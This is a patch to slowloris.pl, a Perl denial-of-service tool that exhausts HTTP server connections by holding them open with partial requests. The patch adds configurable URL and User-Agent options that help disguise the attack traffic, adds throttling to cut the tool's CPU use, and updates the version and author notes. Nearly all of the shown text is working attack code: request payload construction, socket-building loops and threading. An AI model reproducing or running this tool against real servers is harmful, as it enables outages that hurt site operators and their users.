# References: # http://wiki.apache.org/httpd/DoS # http://ha.ckers.org/slowloris/ --- slowloris.pl.orig 2009-06-17 00:00:00.000000000 +0200 +++ slowloris.pl 2011-04-29 00:00:00.000000000 +0200 @@ -38,10 +38,14 @@ Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client EOTEXT +my $url = "/"; +my $agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12; SlowLoris Patched)"; my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); my ( $cache, $httpready, $method, $ssl, $rand, $tcpto ); my $result = GetOptions( 'shost=s' => \$shost, + 'agent=s' => \$agent, + 'url=s' => \$url, 'dns=s' => \$host, 'httpready' => \$httpready, 'num=i' => \$connections, @@ -55,7 +59,7 @@ ); if ($version) { - print "Version 0.7\n"; + print "Version 0.7p2\n"; exit; } @@ -164,9 +168,9 @@ $rand = ""; } my $primarypayload = - "GET /$rand HTTP/1.1\r\n" + "GET $url$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" - . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" + . "User-Agent: $agent\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now comes the waiting game...\n"; @@ -241,6 +245,7 @@ $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { + #select(undef, undef, undef, 0.1); if ( $working[$z] == 0 ) { if ($ssl) { if ( @@ -283,9 +288,9 @@ $rand = ""; } my $primarypayload = - "$method /$rand HTTP/1.1\r\n" + "$method $url$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" - . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" + . "User-Agent: $agent\r\n" . "Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { @@ -316,6 +321,7 @@ } print "\t\tSending data.\n"; foreach my $z ( 1 .. $num ) { + #select(undef, undef, undef, 0.1); if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; @@ -350,6 +356,7 @@ my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { + #select(undef, undef, undef, 0.1); $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; @@ -357,6 +364,7 @@ my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; + select(undef, undef, undef, 0.1); # reduce CPU drain } } @@ -368,15 +376,15 @@ =head1 VERSION -Version 0.7 Beta +Version 0.7p2 Beta =head1 DATE -06/17/2009 +06/17/2009, 29.Apr.2011 =head1 AUTHOR -RSnake with threading from John Kinsella +RSnake with threading from John Kinsella and patch to reduce CPU drain from Guillermo Grandes =head1 ABSTRACT END